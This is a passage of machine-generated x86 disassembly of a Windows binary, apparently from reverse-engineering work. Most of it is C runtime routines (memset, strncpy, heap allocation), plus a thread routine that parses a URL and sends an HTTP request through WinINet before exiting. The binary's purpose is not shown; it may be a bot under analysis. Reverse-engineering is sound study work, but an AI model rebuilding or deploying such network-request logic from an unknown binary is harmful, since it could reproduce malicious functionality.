[ebp+arg_0] add esp, 50h pop edi pop esi pop ebx leave retn sub_41AA43 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41ACF7 proc near ; CODE XREF: sub_401ACD+279Dp ; sub_401ACD+72F6p var_8C = byte ptr -8Ch var_C = byte ptr -0Ch var_8 = byte ptr -8 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 8Ch push esi mov esi, 80h push esi lea eax, [ebp+var_8C] push 0 push eax call sub_41B590 add esp, 0Ch cmp ds:dword_4CB73C, 0 jnz short loc_41AD63 push 0 lea eax, [ebp+var_8C] push esi push eax lea eax, [ebp+var_C] push eax call ds:dword_4CB518 ; InternetGetConnectedStateEx test eax, eax jnz short loc_41AD4C lea eax, [ebp+var_8C] push offset dword_43A87C push eax call sub_41B886 pop ecx pop ecx loc_41AD4C: ; CODE XREF: sub_41ACF7+40j test [ebp+var_C], 1 jz short loc_41AD59 push offset dword_43A874 jmp short loc_41AD5E ; --------------------------------------------------------------------------- loc_41AD59: ; CODE XREF: sub_41ACF7+59j push offset dword_43A870 loc_41AD5E: ; CODE XREF: sub_41ACF7+60j lea eax, [ebp+var_8] jmp short loc_41AD7B ; --------------------------------------------------------------------------- loc_41AD63: ; CODE XREF: sub_41ACF7+28j mov esi, offset off_43A86C lea eax, [ebp+var_8] push esi push eax call sub_41B886 pop ecx lea eax, [ebp+var_8C] pop ecx push esi loc_41AD7B: ; CODE XREF: sub_41ACF7+6Aj push eax call sub_41B886 pop ecx pop ecx push [ebp+arg_4] push [ebp+arg_8] call sub_40AC10 pop ecx push eax lea eax, [ebp+var_8C] push eax lea eax, [ebp+var_8] push eax push offset dword_43A828 push 200h push [ebp+arg_0] call sub_41B980 mov eax, [ebp+arg_0] add esp, 1Ch pop esi leave retn sub_41ACF7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41ADB6 proc near ; DATA XREF: sub_401ACD+7715o var_65C = byte ptr -65Ch var_55C = byte ptr -55Ch var_35C = dword ptr -35Ch var_358 = byte ptr -358h var_2D8 = byte ptr -2D8h var_258 = byte ptr -258h var_1D8 = dword ptr -1D8h var_1D4 = dword ptr -1D4h var_1D0 = dword ptr -1D0h var_1C8 = byte ptr -1C8h var_148 = byte ptr -148h var_C8 = byte ptr -0C8h var_48 = dword ptr -48h var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = word ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 65Ch mov eax, [ebp+arg_0] push ebx push esi push edi push 65h mov esi, eax pop ecx lea edi, [ebp+var_35C] rep movsd push 1 mov edi, 80h pop esi xor ebx, ebx mov [eax+190h], esi push edi lea eax, [ebp+var_148] push ebx push eax mov [ebp+var_C], ebx mov [ebp+var_4], ebx mov [ebp+var_8], offset dword_43A95C call sub_41B590 push edi lea eax, [ebp+var_1C8] push ebx push eax call sub_41B590 push edi lea eax, [ebp+var_C8] push ebx push eax call sub_41B590 push 100h lea eax, [ebp+var_65C] push ebx push eax call sub_41B590 push 3Ch lea eax, [ebp+var_48] pop edi push edi push ebx push eax call sub_41B590 add esp, 3Ch lea eax, [ebp+var_48] mov [ebp+var_48], edi mov [ebp+var_34], esi push eax lea eax, [ebp+var_358] push ebx push eax mov [ebp+var_28], esi mov [ebp+var_20], esi mov [ebp+var_18], esi call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_358] push eax call ds:dword_4CB550 ; InternetCrackUrlA test eax, eax jz loc_41AF50 cmp [ebp+var_34], ebx jbe short loc_41AE8D push [ebp+var_34] lea eax, [ebp+var_148] push [ebp+var_38] push eax call sub_41B5F0 add esp, 0Ch loc_41AE8D: ; CODE XREF: sub_41ADB6+C0j cmp [ebp+var_28], ebx movzx esi, [ebp+var_30] jbe short loc_41AEAB push [ebp+var_28] lea eax, [ebp+var_1C8] push [ebp+var_2C] push eax call sub_41B5F0 add esp, 0Ch loc_41AEAB: ; CODE XREF: sub_41ADB6+DEj cmp [ebp+var_20], ebx jbe short loc_41AEC5 push [ebp+var_20] lea eax, [ebp+var_C8] push [ebp+var_24] push eax call sub_41B5F0 add esp, 0Ch loc_41AEC5: ; CODE XREF: sub_41ADB6+F8j cmp [ebp+var_18], ebx jbe short loc_41AEDF push [ebp+var_18] lea eax, [ebp+var_65C] push [ebp+var_1C] push eax call sub_41B5F0 add esp, 0Ch loc_41AEDF: ; CODE XREF: sub_41ADB6+112j push ebx push ebx lea eax, [ebp+var_C8] push 3 push eax lea eax, [ebp+var_1C8] push eax lea eax, [ebp+var_148] push esi push eax push ds:dword_4CB604 call ds:dword_4CB628 ; InternetConnectA mov esi, eax cmp esi, ebx jz short loc_41AF68 push ebx lea eax, [ebp+var_8] push 200h push eax lea eax, [ebp+var_2D8] push eax lea eax, [ebp+var_65C] push ebx push eax push ebx push esi call ds:dword_4CB61C ; HttpOpenRequestA cmp eax, ebx mov [ebp+var_4], eax jz short loc_41AF6F push ebx push ebx push ebx push ebx push eax call ds:dword_4CB5C8 ; HttpSendRequestA test eax, eax jz short loc_41AF49 push offset dword_43A940 jmp short loc_41AF74 ; --------------------------------------------------------------------------- loc_41AF49: ; CODE XREF: sub_41ADB6+18Aj push offset unk_43A904 jmp short loc_41AF74 ; --------------------------------------------------------------------------- loc_41AF50: ; CODE XREF: sub_41ADB6+B7j lea eax, [ebp+var_55C] push offset dword_43A8E8 push eax call sub_41B886 mov esi, [ebp+var_C] pop ecx pop ecx jmp short loc_41AF82 ; --------------------------------------------------------------------------- loc_41AF68: ; CODE XREF: sub_41ADB6+153j push offset unk_43A8BC jmp short loc_41AF74 ; --------------------------------------------------------------------------- loc_41AF6F: ; CODE XREF: sub_41ADB6+17Bj push offset unk_43A88C loc_41AF74: ; CODE XREF: sub_41ADB6+191j ; sub_41ADB6+198j ... lea eax, [ebp+var_55C] push eax call sub_41B886 pop ecx pop ecx loc_41AF82: ; CODE XREF: sub_41ADB6+1B0j cmp [ebp+var_1D4], ebx jnz short loc_41AFAD push ebx lea eax, [ebp+var_55C] push [ebp+var_1D0] push eax lea eax, [ebp+var_258] push eax push [ebp+var_35C] call sub_409A73 add esp, 14h loc_41AFAD: ; CODE XREF: sub_41ADB6+1D2j lea eax, [ebp+var_55C] push eax call sub_4151AD pop ecx push esi call ds:dword_4CB688 ; InternetCloseHandle push [ebp+var_4] call ds:dword_4CB688 ; InternetCloseHandle push [ebp+var_1D8] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_41ADB6 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_41AFE0 proc near ; CODE XREF: sub_401000+34p ; sub_401221+14Dp ... arg_0 = dword ptr 4 mov ecx, [esp+arg_0] test ecx, 3 jz short loc_41B000 loc_41AFEC: ; CODE XREF: sub_41AFE0+19j mov al, [ecx] inc ecx test al, al jz short loc_41B033 test ecx, 3 jnz short loc_41AFEC add eax, 0 loc_41B000: ; CODE XREF: sub_41AFE0+Aj ; sub_41AFE0+36j ... mov eax, [ecx] mov edx, 7EFEFEFFh add edx, eax xor eax, 0FFFFFFFFh xor eax, edx add ecx, 4 test eax, 81010100h jz short loc_41B000 mov eax, [ecx-4] test al, al jz short loc_41B051 test ah, ah jz short loc_41B047 test eax, 0FF0000h jz short loc_41B03D test eax, 0FF000000h jz short loc_41B033 jmp short loc_41B000 ; --------------------------------------------------------------------------- loc_41B033: ; CODE XREF: sub_41AFE0+11j ; sub_41AFE0+4Fj lea eax, [ecx-1] mov ecx, [esp+arg_0] sub eax, ecx retn ; --------------------------------------------------------------------------- loc_41B03D: ; CODE XREF: sub_41AFE0+48j lea eax, [ecx-2] mov ecx, [esp+arg_0] sub eax, ecx retn ; --------------------------------------------------------------------------- loc_41B047: ; CODE XREF: sub_41AFE0+41j lea eax, [ecx-3] mov ecx, [esp+arg_0] sub eax, ecx retn ; --------------------------------------------------------------------------- loc_41B051: ; CODE XREF: sub_41AFE0+3Dj lea eax, [ecx-4] mov ecx, [esp+arg_0] sub eax, ecx retn sub_41AFE0 endp ; =============== S U B R O U T I N E ======================================= sub_41B05B proc near ; CODE XREF: sub_4010AB+64p ; sub_401ACD+58DBp ... arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push edi or edi, 0FFFFFFFFh mov eax, [esi+0Ch] test al, 40h jz short loc_41B070 or eax, 0FFFFFFFFh jmp short loc_41B0AA ; --------------------------------------------------------------------------- loc_41B070: ; CODE XREF: sub_41B05B+Ej test al, 83h jz short loc_41B0A8 push esi call sub_41DB8B push esi mov edi, eax call sub_41DB25 push dword ptr [esi+10h] call sub_41DA72 add esp, 0Ch test eax, eax jge short loc_41B096 or edi, 0FFFFFFFFh jmp short loc_41B0A8 ; --------------------------------------------------------------------------- loc_41B096: ; CODE XREF: sub_41B05B+34j mov eax, [esi+1Ch] test eax, eax jz short loc_41B0A8 push eax call sub_41B0B1 and dword ptr [esi+1Ch], 0 pop ecx loc_41B0A8: ; CODE XREF: sub_41B05B+17j ; sub_41B05B+39j ... mov eax, edi loc_41B0AA: ; CODE XREF: sub_41B05B+13j and dword ptr [esi+0Ch], 0 pop edi pop esi retn sub_41B05B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B0B1 proc near ; CODE XREF: sub_4010AB+5Ep ; sub_40AB32+B1p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push esi mov esi, [ebp+arg_0] test esi, esi jz short loc_41B117 mov eax, ds:dword_4DCFE8 cmp eax, 3 jnz short loc_41B0DD push esi call sub_41DE77 pop ecx test eax, eax push esi jz short loc_41B109 push eax call sub_41DEA2 pop ecx pop ecx jmp short loc_41B117 ; --------------------------------------------------------------------------- loc_41B0DD: ; CODE XREF: sub_41B0B1+14j cmp eax, 2 jnz short loc_41B108 lea eax, [ebp+arg_0] push eax lea eax, [ebp+var_4] push eax push esi call sub_41EBD2 add esp, 0Ch test eax, eax jz short loc_41B108 push eax push [ebp+arg_0] push [ebp+var_4] call sub_41EC29 add esp, 0Ch jmp short loc_41B117 ; --------------------------------------------------------------------------- loc_41B108: ; CODE XREF: sub_41B0B1+2Fj ; sub_41B0B1+44j push esi loc_41B109: ; CODE XREF: sub_41B0B1+20j push 0 push ds:dword_4DCFE4 call dword_427140 ; RtlFreeHeap loc_41B117: ; CODE XREF: sub_41B0B1+Aj ; sub_41B0B1+2Aj ... pop esi leave retn sub_41B0B1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B11A proc near ; CODE XREF: sub_4010AB+45p ; sub_40F03C+4Ep ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ecx push ebx push esi push edi mov edi, [ebp+arg_4] imul edi, [ebp+arg_8] mov ebx, [ebp+arg_0] mov ecx, edi test edi, edi mov [ebp+var_4], edi mov [ebp+arg_0], ecx jnz short loc_41B13E xor eax, eax jmp loc_41B1E7 ; --------------------------------------------------------------------------- loc_41B13E: ; CODE XREF: sub_41B11A+1Bj mov esi, [ebp+arg_C] test word ptr [esi+0Ch], 10Ch jz short loc_41B151 mov eax, [esi+18h] mov [ebp+arg_C], eax jmp short loc_41B15D ; --------------------------------------------------------------------------- loc_41B151: ; CODE XREF: sub_41B11A+2Dj mov [ebp+arg_C], 1000h jmp short loc_41B15D ; --------------------------------------------------------------------------- loc_41B15A: ; CODE XREF: sub_41B11A+C4j mov ecx, [ebp+arg_0] loc_41B15D: ; CODE XREF: sub_41B11A+35j ; sub_41B11A+3Ej test word ptr [esi+0Ch], 10Ch jz short loc_41B18F mov eax, [esi+4] test eax, eax jz short loc_41B18F cmp ecx, eax mov edi, ecx jb short loc_41B174 mov edi, eax loc_41B174: ; CODE XREF: sub_41B11A+56j push edi push dword ptr [esi] push ebx call sub_41C310 sub [ebp+arg_0], edi sub [esi+4], edi add [esi], edi add esp, 0Ch add ebx, edi mov edi, [ebp+var_4] jmp short loc_41B1DA ; --------------------------------------------------------------------------- loc_41B18F: ; CODE XREF: sub_41B11A+49j ; sub_41B11A+50j cmp ecx, [ebp+arg_C] jb short loc_41B1C2 cmp [ebp+arg_C], 0 mov eax, ecx jz short loc_41B1A5 xor edx, edx div [ebp+arg_C] mov eax, ecx sub eax, edx loc_41B1A5: ; CODE XREF: sub_41B11A+80j push eax push ebx push dword ptr [esi+10h] call sub_41F11C add esp, 0Ch test eax, eax jz short loc_41B1EC cmp eax, 0FFFFFFFFh jz short loc_41B1F2 sub [ebp+arg_0], eax add ebx, eax jmp short loc_41B1DA ; --------------------------------------------------------------------------- loc_41B1C2: ; CODE XREF: sub_41B11A+78j push esi call sub_41F043 cmp eax, 0FFFFFFFFh pop ecx jz short loc_41B1F6 mov [ebx], al mov eax, [esi+18h] inc ebx dec [ebp+arg_0] mov [ebp+arg_C], eax loc_41B1DA: ; CODE XREF: sub_41B11A+73j ; sub_41B11A+A6j cmp [ebp+arg_0], 0 jnz loc_41B15A mov eax, [ebp+arg_8] loc_41B1E7: ; CODE XREF: sub_41B11A+1Fj ; sub_41B11A+E6j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_41B1EC: ; CODE XREF: sub_41B11A+9Aj or dword ptr [esi+0Ch], 10h jmp short loc_41B1F6 ; --------------------------------------------------------------------------- loc_41B1F2: ; CODE XREF: sub_41B11A+9Fj or dword ptr [esi+0Ch], 20h loc_41B1F6: ; CODE XREF: sub_41B11A+B2j ; sub_41B11A+D6j mov eax, edi xor edx, edx sub eax, [ebp+arg_0] div [ebp+arg_4] jmp short loc_41B1E7 sub_41B11A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B202 proc near ; CODE XREF: sub_4010AB+2Ep ; sub_41CFD3+35p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx cmp [ebp+arg_0], 0 push ebx push esi push edi jnz short loc_41B21D push [ebp+arg_4] call sub_41B4D5 pop ecx jmp loc_41B49D ; --------------------------------------------------------------------------- loc_41B21D: ; CODE XREF: sub_41B202+Bj mov esi, [ebp+arg_4] test esi, esi jnz short loc_41B232 push [ebp+arg_0] call sub_41B0B1 pop ecx jmp loc_41B49B ; --------------------------------------------------------------------------- loc_41B232: ; CODE XREF: sub_41B202+20j mov eax, ds:dword_4DCFE8 cmp eax, 3 jnz loc_41B342 loc_41B240: ; CODE XREF: sub_41B202+12Ej xor edi, edi cmp esi, 0FFFFFFE0h ja loc_41B31E push [ebp+arg_0] call sub_41DE77 mov ebx, eax pop ecx test ebx, ebx jz loc_41B2F9 cmp esi, ds:dword_4DCFE0 ja short loc_41B2B2 mov edi, [ebp+arg_0] push esi push edi push ebx call sub_41E680 add esp, 0Ch test eax, eax jnz short loc_41B2AE push esi call sub_41E1CB mov edi, eax pop ecx test edi, edi jz short loc_41B2B2 mov ebx, [ebp+arg_0] mov eax, [ebx-4] dec eax cmp eax, esi jb short loc_41B292 mov eax, esi loc_41B292: ; CODE XREF: sub_41B202+8Cj push eax push ebx push edi call sub_41C310 push ebx call sub_41DE77 push [ebp+arg_0] mov ebx, eax push ebx call sub_41DEA2 add esp, 18h loc_41B2AE: ; CODE XREF: sub_41B202+74j test edi, edi jnz short loc_41B2F5 loc_41B2B2: ; CODE XREF: sub_41B202+62j ; sub_41B202+81j test esi, esi jnz short loc_41B2B9 push 1 pop esi loc_41B2B9: ; CODE XREF: sub_41B202+B2j add esi, 0Fh and esi, 0FFFFFFF0h push esi push 0 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap mov edi, eax test edi, edi jz short loc_41B2F5 mov ecx, [ebp+arg_0] mov eax, [ecx-4] dec eax cmp eax, esi jb short loc_41B2E1 mov eax, esi loc_41B2E1: ; CODE XREF: sub_41B202+DBj push eax push ecx push edi call sub_41C310 push [ebp+arg_0] push ebx call sub_41DEA2 add esp, 14h loc_41B2F5: ; CODE XREF: sub_41B202+AEj ; sub_41B202+D0j test ebx, ebx jnz short loc_41B31A loc_41B2F9: ; CODE XREF: sub_41B202+56j test esi, esi jnz short loc_41B300 push 1 pop esi loc_41B300: ; CODE XREF: sub_41B202+F9j add esi, 0Fh and esi, 0FFFFFFF0h push esi push [ebp+arg_0] push 0 push ds:dword_4DCFE4 call dword_427198 ; RtlReAllocateHeap mov edi, eax loc_41B31A: ; CODE XREF: sub_41B202+F5j test edi, edi jnz short loc_41B33B loc_41B31E: ; CODE XREF: sub_41B202+43j cmp ds:dword_4DB9DC, 0 jz short loc_41B33B push esi call sub_41F312 test eax, eax pop ecx jnz loc_41B240 jmp loc_41B49B ; --------------------------------------------------------------------------- loc_41B33B: ; CODE XREF: sub_41B202+11Aj ; sub_41B202+123j ... mov eax, edi jmp loc_41B49D ; --------------------------------------------------------------------------- loc_41B342: ; CODE XREF: sub_41B202+38j cmp eax, 2 jnz loc_41B45D cmp esi, 0FFFFFFE0h ja short loc_41B35F test esi, esi jbe short loc_41B35C add esi, 0Fh and esi, 0FFFFFFF0h jmp short loc_41B35F ; --------------------------------------------------------------------------- loc_41B35C: ; CODE XREF: sub_41B202+150j push 10h pop esi loc_41B35F: ; CODE XREF: sub_41B202+14Cj ; sub_41B202+158j ... xor edi, edi cmp esi, 0FFFFFFE0h ja loc_41B43F lea eax, [ebp+arg_4] push eax lea eax, [ebp+var_4] push eax push [ebp+arg_0] call sub_41EBD2 mov ebx, eax add esp, 0Ch test ebx, ebx jz loc_41B423 cmp esi, dword_43C9D4 jnb short loc_41B3E7 mov edi, esi shr edi, 4 push edi push ebx push [ebp+arg_4] push [ebp+var_4] call sub_41EF9A add esp, 10h test eax, eax jz short loc_41B3AD mov edi, [ebp+arg_0] jmp short loc_41B3DF ; --------------------------------------------------------------------------- loc_41B3AD: ; CODE XREF: sub_41B202+1A4j push edi call sub_41EC6E mov edi, eax pop ecx test edi, edi jz short loc_41B3E7 movzx eax, byte ptr [ebx] shl eax, 4 cmp eax, esi jb short loc_41B3C6 mov eax, esi loc_41B3C6: ; CODE XREF: sub_41B202+1C0j push eax push [ebp+arg_0] push edi call sub_41C310 push ebx push [ebp+arg_4] push [ebp+var_4] call sub_41EC29 add esp, 18h loc_41B3DF: ; CODE XREF: sub_41B202+1A9j test edi, edi jnz loc_41B33B loc_41B3E7: ; CODE XREF: sub_41B202+18Bj ; sub_41B202+1B6j push esi push 0 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap mov edi, eax test edi, edi jz short loc_41B43F movzx eax, byte ptr [ebx] shl eax, 4 cmp eax, esi jb short loc_41B408 mov eax, esi loc_41B408: ; CODE XREF: sub_41B202+202j push eax push [ebp+arg_0] push edi call sub_41C310 push ebx push [ebp+arg_4] push [ebp+var_4] call sub_41EC29 add esp, 18h jmp short loc_41B437 ; --------------------------------------------------------------------------- loc_41B423: ; CODE XREF: sub_41B202+17Fj push esi push [ebp+arg_0] push 0 push ds:dword_4DCFE4 call dword_427198 ; RtlReAllocateHeap mov edi, eax loc_41B437: ; CODE XREF: sub_41B202+21Fj test edi, edi jnz loc_41B33B loc_41B43F: ; CODE XREF: sub_41B202+162j ; sub_41B202+1F8j cmp ds:dword_4DB9DC, 0 jz loc_41B33B push esi call sub_41F312 test eax, eax pop ecx jnz loc_41B35F jmp short loc_41B49B ; --------------------------------------------------------------------------- loc_41B45D: ; CODE XREF: sub_41B202+143j ; sub_41B202+297j xor eax, eax cmp esi, 0FFFFFFE0h ja short loc_41B487 test esi, esi jnz short loc_41B46B push 1 pop esi loc_41B46B: ; CODE XREF: sub_41B202+264j add esi, 0Fh and esi, 0FFFFFFF0h push esi push [ebp+arg_0] push 0 push ds:dword_4DCFE4 call dword_427198 ; RtlReAllocateHeap test eax, eax jnz short loc_41B49D loc_41B487: ; CODE XREF: sub_41B202+260j cmp ds:dword_4DB9DC, 0 jz short loc_41B49D push esi call sub_41F312 test eax, eax pop ecx jnz short loc_41B45D loc_41B49B: ; CODE XREF: sub_41B202+2Bj ; sub_41B202+134j ... xor eax, eax loc_41B49D: ; CODE XREF: sub_41B202+16j ; sub_41B202+13Bj ... pop edi pop esi pop ebx leave retn sub_41B202 endp ; =============== S U B R O U T I N E ======================================= sub_41B4A2 proc near ; CODE XREF: sub_41B4C2+Ap arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch call sub_41F49D test eax, eax jnz short loc_41B4AC retn ; --------------------------------------------------------------------------- loc_41B4AC: ; CODE XREF: sub_41B4A2+7j push eax push [esp+4+arg_8] push [esp+8+arg_4] push [esp+0Ch+arg_0] call sub_41F32D add esp, 10h retn sub_41B4A2 endp ; =============== S U B R O U T I N E ======================================= sub_41B4C2 proc near ; CODE XREF: sub_4010AB+18p ; sub_401ACD+58AFp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push 40h push [esp+4+arg_4] push [esp+8+arg_0] call sub_41B4A2 add esp, 0Ch retn sub_41B4C2 endp ; =============== S U B R O U T I N E ======================================= sub_41B4D5 proc near ; CODE XREF: sub_4010AB+6p ; sub_40AB32+63p ... arg_0 = dword ptr 4 push ds:dword_4DB9DC push [esp+4+arg_0] call sub_41B4E7 pop ecx pop ecx retn sub_41B4D5 endp ; =============== S U B R O U T I N E ======================================= sub_41B4E7 proc near ; CODE XREF: sub_41B4D5+Ap ; sub_41CFC5+6p arg_0 = dword ptr 4 arg_4 = dword ptr 8 cmp [esp+arg_0], 0FFFFFFE0h ja short loc_41B510 loc_41B4EE: ; CODE XREF: sub_41B4E7+27j push [esp+arg_0] call sub_41B513 test eax, eax pop ecx jnz short locret_41B512 cmp [esp+arg_4], eax jz short locret_41B512 push [esp+arg_0] call sub_41F312 test eax, eax pop ecx jnz short loc_41B4EE loc_41B510: ; CODE XREF: sub_41B4E7+5j xor eax, eax locret_41B512: ; CODE XREF: sub_41B4E7+13j ; sub_41B4E7+19j retn sub_41B4E7 endp ; =============== S U B R O U T I N E ======================================= sub_41B513 proc near ; CODE XREF: sub_41B4E7+Bp arg_0 = dword ptr 4 mov eax, ds:dword_4DCFE8 push esi mov esi, [esp+4+arg_0] cmp eax, 3 jnz short loc_41B537 cmp esi, ds:dword_4DCFE0 ja short loc_41B569 push esi call sub_41E1CB test eax, eax pop ecx jz short loc_41B569 pop esi retn ; --------------------------------------------------------------------------- loc_41B537: ; CODE XREF: sub_41B513+Dj cmp eax, 2 jnz short loc_41B569 mov eax, [esp+4+arg_0] test eax, eax jz short loc_41B54C lea esi, [eax+0Fh] and esi, 0FFFFFFF0h jmp short loc_41B54F ; --------------------------------------------------------------------------- loc_41B54C: ; CODE XREF: sub_41B513+2Fj push 10h pop esi loc_41B54F: ; CODE XREF: sub_41B513+37j cmp esi, dword_43C9D4 ja short loc_41B576 mov eax, esi shr eax, 4 push eax call sub_41EC6E test eax, eax pop ecx jnz short loc_41B585 jmp short loc_41B576 ; --------------------------------------------------------------------------- loc_41B569: ; CODE XREF: sub_41B513+15j ; sub_41B513+20j ... test esi, esi jnz short loc_41B570 push 1 pop esi loc_41B570: ; CODE XREF: sub_41B513+58j add esi, 0Fh and esi, 0FFFFFFF0h loc_41B576: ; CODE XREF: sub_41B513+42j ; sub_41B513+54j push esi push 0 push ds:dword_4DCFE4 call dword_427144 ; RtlAllocateHeap loc_41B585: ; CODE XREF: sub_41B513+52j pop esi retn sub_41B513 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41B590 proc near ; CODE XREF: sub_40111D+3Cp ; sub_40111D+4Ap ... arg_0 = dword ptr 4 arg_4 = byte ptr 8 arg_8 = dword ptr 0Ch mov edx, [esp+arg_8] mov ecx, [esp+arg_0] test edx, edx jz short loc_41B5E3 xor eax, eax mov al, [esp+arg_4] push edi mov edi, ecx cmp edx, 4 jb short loc_41B5D7 neg ecx and ecx, 3 jz short loc_41B5B9 sub edx, ecx loc_41B5B3: ; CODE XREF: sub_41B590+27j mov [edi], al inc edi dec ecx jnz short loc_41B5B3 loc_41B5B9: ; CODE XREF: sub_41B590+1Fj mov ecx, eax shl eax, 8 add eax, ecx mov ecx, eax shl eax, 10h add eax, ecx mov ecx, edx and edx, 3 shr ecx, 2 jz short loc_41B5D7 rep stosd test edx, edx jz short loc_41B5DD loc_41B5D7: ; CODE XREF: sub_41B590+18j ; sub_41B590+3Fj ... mov [edi], al inc edi dec edx jnz short loc_41B5D7 loc_41B5DD: ; CODE XREF: sub_41B590+45j mov eax, [esp+4+arg_0] pop edi retn ; --------------------------------------------------------------------------- loc_41B5E3: ; CODE XREF: sub_41B590+Aj mov eax, [esp+arg_0] retn sub_41B590 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41B5F0 proc near ; CODE XREF: sub_401221+49Fp ; sub_401221+4BBp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov ecx, [esp+arg_8] push edi test ecx, ecx jz short loc_41B673 push esi push ebx mov ebx, ecx mov esi, [esp+0Ch+arg_4] test esi, 3 mov edi, [esp+0Ch+arg_0] jnz short loc_41B614 shr ecx, 2 jnz short loc_41B681 jmp short loc_41B635 ; --------------------------------------------------------------------------- loc_41B614: ; CODE XREF: sub_41B5F0+1Bj ; sub_41B5F0+37j mov al, [esi] inc esi mov [edi], al inc edi dec ecx jz short loc_41B642 test al, al jz short loc_41B64A test esi, 3 jnz short loc_41B614 mov ebx, ecx shr ecx, 2 jnz short loc_41B681 loc_41B630: ; CODE XREF: sub_41B5F0+8Fj and ebx, 3 jz short loc_41B642 loc_41B635: ; CODE XREF: sub_41B5F0+22j ; sub_41B5F0+50j mov al, [esi] inc esi mov [edi], al inc edi test al, al jz short loc_41B66E dec ebx jnz short loc_41B635 loc_41B642: ; CODE XREF: sub_41B5F0+2Bj ; sub_41B5F0+43j mov eax, [esp+0Ch+arg_0] pop ebx pop esi pop edi retn ; --------------------------------------------------------------------------- loc_41B64A: ; CODE XREF: sub_41B5F0+2Fj test edi, 3 jz short loc_41B664 loc_41B652: ; CODE XREF: sub_41B5F0+72j mov [edi], al inc edi dec ecx jz loc_41B6E6 test edi, 3 jnz short loc_41B652 loc_41B664: ; CODE XREF: sub_41B5F0+60j mov ebx, ecx shr ecx, 2 jnz short loc_41B6D7 loc_41B66B: ; CODE XREF: sub_41B5F0+7Fj ; sub_41B5F0+F4j mov [edi], al inc edi loc_41B66E: ; CODE XREF: sub_41B5F0+4Dj dec ebx jnz short loc_41B66B pop ebx pop esi loc_41B673: ; CODE XREF: sub_41B5F0+7j mov eax, [esp+4+arg_0] pop edi retn ; --------------------------------------------------------------------------- loc_41B679: ; CODE XREF: sub_41B5F0+A9j ; sub_41B5F0+C1j mov [edi], edx add edi, 4 dec ecx jz short loc_41B630 loc_41B681: ; CODE XREF: sub_41B5F0+20j ; sub_41B5F0+3Ej mov edx, 7EFEFEFFh mov eax, [esi] add edx, eax xor eax, 0FFFFFFFFh xor eax, edx mov edx, [esi] add esi, 4 test eax, 81010100h jz short loc_41B679 test dl, dl jz short loc_41B6CB test dh, dh jz short loc_41B6C1 test edx, 0FF0000h jz short loc_41B6B7 test edx, 0FF000000h jnz short loc_41B679 mov [edi], edx jmp short loc_41B6CF ; --------------------------------------------------------------------------- loc_41B6B7: ; CODE XREF: sub_41B5F0+B9j and edx, 0FFFFh mov [edi], edx jmp short loc_41B6CF ; --------------------------------------------------------------------------- loc_41B6C1: ; CODE XREF: sub_41B5F0+B1j and edx, 0FFh mov [edi], edx jmp short loc_41B6CF ; --------------------------------------------------------------------------- loc_41B6CB: ; CODE XREF: sub_41B5F0+ADj xor edx, edx mov [edi], edx loc_41B6CF: ; CODE XREF: sub_41B5F0+C5j ; sub_41B5F0+CFj ... add edi, 4 xor eax, eax dec ecx jz short loc_41B6E1 loc_41B6D7: ; CODE XREF: sub_41B5F0+79j xor eax, eax loc_41B6D9: ; CODE XREF: sub_41B5F0+EFj mov [edi], eax add edi, 4 dec ecx jnz short loc_41B6D9 loc_41B6E1: ; CODE XREF: sub_41B5F0+E5j and ebx, 3 jnz short loc_41B66B loc_41B6E6: ; CODE XREF: sub_41B5F0+66j mov eax, [esp+0Ch+arg_0] pop ebx pop esi pop edi retn sub_41B5F0 endp ; =============== S U B R O U T I N E ======================================= sub_41B6EE proc near ; CODE XREF: sub_41B779+4p ; sub_4247EC+1A2p ... arg_0 = dword ptr 4 push ebx push ebp push esi push edi mov edi, [esp+10h+arg_0] loc_41B6F6: ; CODE XREF: sub_41B6EE+34j cmp dword_43CBE4, 1 jle short loc_41B70E movzx eax, byte ptr [edi] push 8 push eax call sub_41F515 pop ecx pop ecx jmp short loc_41B71D ; --------------------------------------------------------------------------- loc_41B70E: ; CODE XREF: sub_41B6EE+Fj movzx eax, byte ptr [edi] mov ecx, off_43C9D8 mov al, [ecx+eax*2] and eax, 8 loc_41B71D: ; CODE XREF: sub_41B6EE+1Ej test eax, eax jz short loc_41B724 inc edi jmp short loc_41B6F6 ; --------------------------------------------------------------------------- loc_41B724: ; CODE XREF: sub_41B6EE+31j movzx esi, byte ptr [edi] inc edi cmp esi, 2Dh mov ebp, esi jz short loc_41B734 cmp esi, 2Bh jnz short loc_41B738 loc_41B734: ; CODE XREF: sub_41B6EE+3Fj movzx esi, byte ptr [edi] inc edi loc_41B738: ; CODE XREF: sub_41B6EE+44j xor ebx, 